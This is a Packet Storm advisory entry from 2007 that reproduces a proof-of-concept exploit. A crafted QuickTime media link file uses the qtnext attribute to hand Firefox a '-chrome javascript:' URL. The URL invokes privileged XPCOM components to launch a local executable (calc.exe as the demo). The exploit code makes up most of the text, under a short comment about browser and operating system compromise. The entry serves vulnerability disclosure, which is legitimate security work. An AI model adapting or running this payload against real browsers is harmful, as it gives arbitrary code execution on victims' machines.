appleqt-exec.txt

2007-09-13T00:00:00
ID PACKETSTORM:59297
Type packetstorm
Reporter petko d. petkov
Modified 2007-09-13T00:00:00

Description

                                        
                                            `<!--  
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox  
  
It seams that QuickTime media formats can hack into Firefox.   
The result of this vulnerability can lead to full compromise of   
the browser and maybe even the underlaying operating system.   
Don't try this at home.  
-->  
  
<?xml version="1.0">  
<?quicktime type="application/x-quicktime-media-link"?>  
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>  
  
`